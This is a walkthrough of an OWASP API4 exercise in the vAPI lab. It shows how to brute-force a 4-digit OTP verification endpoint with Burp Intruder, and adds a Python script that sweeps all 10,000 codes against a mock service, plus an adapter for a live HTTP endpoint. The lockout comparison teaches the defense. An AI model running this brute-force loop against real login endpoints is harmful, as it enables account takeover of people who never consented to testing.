Lack of Rate Limiting in vAPI

11 months ago 51

Here we are again with another detailed walkthrough, this time on the lack of rate limiting in vAPI.

Make sure vAPI, Postman and Burp Suite are installed and configured properly, so we can go straight to exploitation.

Definition:

When an API does not limit the number of requests a single client can make, it is said to be lacking resources and rate limiting (OWASP API Security Top 10, API4:2019). Because nothing caps the number of attempts, such an API lets an attacker run brute-force attacks against passwords, tokens and, as in this case, OTPs.

Understanding the scenario:

Let's start our hunt by understanding the attack vector and analysing the request structure in Postman. From the request structure we can see that, instead of a username and password, this app uses an OTP-based login. There are three requests in total: one for generating the OTP, one for verifying the OTP, and the last one for accessing the protected resource.

In the OTP generation request one phone number is already filled in and is to be treated as the target's number. We have neither that phone nor the OTP that gets sent to it, so we cannot reach the resource the intended way. What do we do now?

In the OTP verification request only the OTP is sent as a parameter in the request body, with nothing that ties the attempt to an attempt counter. That is the interesting part, and the one we want to dig into.

Following the given request order, we first send the OTP generation request. To check for a weakness we then send several verification requests with arbitrary random digits. Every one of them is answered the same way: there is no rate-limiting mechanism, lockout or attempt counter that stops us after some failed attempts, so we can send as many verification requests as we want. Since a 4-digit OTP has only 10,000 possible values, this is a request an intruder can exploit by brute force.

The third request only serves to access the resource after successful authentication; we will use it once we have the valid OTP.

Attack:

First send the OTP generation request; the OTP verification request will not work without it. Then send the OTP verification request, capture it in Burp Suite, send it to Intruder and brute force the OTP value with the following settings:

Attack type = Sniper
Payload position = the otp value in the request body
Payload type = Numbers
Value = 0000 to 9999, step 1 (set the minimum integer digits to 4 so the leading zeros are kept; otherwise 0 to 999 are sent as 1- to 3-digit values and never match)
Start the attack

Once the attack is completed, sort the results by status code and analyse the responses with a status code other than 401 (a different response length is another tell). The payload that produced such a response is the valid OTP; use it in the third request to access the resource.
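To make the whole procedure concrete, here is an added Python example that is not part of the original post and not vAPI's code. It sweeps 0000 to 9999 against a verification function the way the Intruder Sniper attack does, stopping at the first response that is not 401, and runs that sweep against a constructed in-memory OTP service in two configurations: the vulnerable one the walkthrough found (no limit on attempts), and a hardened one that locks the OTP after five wrong guesses so the same sweep is stopped by a 429 after six requests. The `http_verify` adapter shows how the same loop would be pointed at the real endpoint; its URL and the JSON body shape `{"otp": ...}` are assumptions to be taken from the Postman collection, not details from the page.

```python
import json
import secrets
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Callable, Optional


class OtpService:
    """Constructed in-memory stand-in for vAPI's OTP endpoints (not vAPI's code).

    It reproduces only the behaviour the walkthrough describes: a 4-digit
    OTP, 401 on a wrong guess, and, in the vulnerable configuration, no
    limit at all on the number of verification attempts.
    """

    def __init__(self, max_failures: Optional[int] = None):
        # max_failures=None -> vulnerable: attempts are never limited
        # max_failures=N    -> hardened: refuse further attempts after N wrong guesses
        self.max_failures = max_failures
        self.otp: Optional[str] = None
        self.failures = 0

    def generate(self, otp: Optional[str] = None) -> str:
        """The 'OTP generation' request. `otp` is a test hook only; a real service never accepts it."""
        self.otp = otp if otp is not None else f"{secrets.randbelow(10_000):04d}"
        self.failures = 0
        return self.otp

    def verify(self, otp: str) -> int:
        """The 'OTP verification' request; returns an HTTP-style status code."""
        if self.otp is None:
            return 400  # nothing to verify against yet
        if self.max_failures is not None and self.failures >= self.max_failures:
            return 429  # hardened: attempts exhausted, the OTP must be regenerated
        if secrets.compare_digest(otp, self.otp):
            return 200
        self.failures += 1
        return 401


@dataclass
class BruteForceResult:
    status: int            # status of the first non-401 response (401 if there was none)
    guess: Optional[str]   # payload that produced it
    attempts: int          # number of verification requests sent

    @property
    def found(self) -> bool:
        return self.status == 200


def brute_force_otp(verify: Callable[[str], int], digits: int = 4) -> BruteForceResult:
    """Sniper-style sweep over 0000..9999, the same thing the Intruder run does.

    Stops at the first response whose status is not 401, which is the
    'responses with status codes other than 401' step of the walkthrough.
    A 200 means the OTP was found; anything else (for example 429) means the
    target pushed back and the response should be inspected, not treated as success.
    """
    status = 401
    for attempts, n in enumerate(range(10 ** digits), start=1):
        guess = f"{n:0{digits}d}"  # keep leading zeros, exactly as the Intruder payload must
        status = verify(guess)
        if status != 401:
            return BruteForceResult(status, guess, attempts)
    return BruteForceResult(status, None, 10 ** digits)


def http_verify(url: str) -> Callable[[str], int]:
    """Adapter for the real endpoint. The URL and the JSON body {"otp": ...}
    are assumptions (take both from the Postman collection); not exercised here."""
    def verify(otp: str) -> int:
        body = json.dumps({"otp": otp}).encode()
        req = urllib.request.Request(url, data=body, method="POST",
                                     headers={"Content-Type": "application/json"})
        try:
            with urllib.request.urlopen(req, timeout=5) as resp:
                return resp.status
        except urllib.error.HTTPError as err:
            return err.code  # 401 on a wrong guess, 429 if the target rate limits
    return verify


if __name__ == "__main__":
    vulnerable = OtpService()
    vulnerable.generate()
    print("no rate limit:", brute_force_otp(vulnerable.verify))

    hardened = OtpService(max_failures=5)
    hardened.generate()
    print("lockout after 5 failures:", brute_force_otp(hardened.verify))
```

Against the vulnerable service the sweep always ends with a 200 and the valid code, after at most 10,000 requests; against the hardened service it ends with a 429 on the sixth request and `found` is false. The constant-time comparison in `verify` is incidental here, since the attack does not rely on timing, but it is what a hardened endpoint should use anyway.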
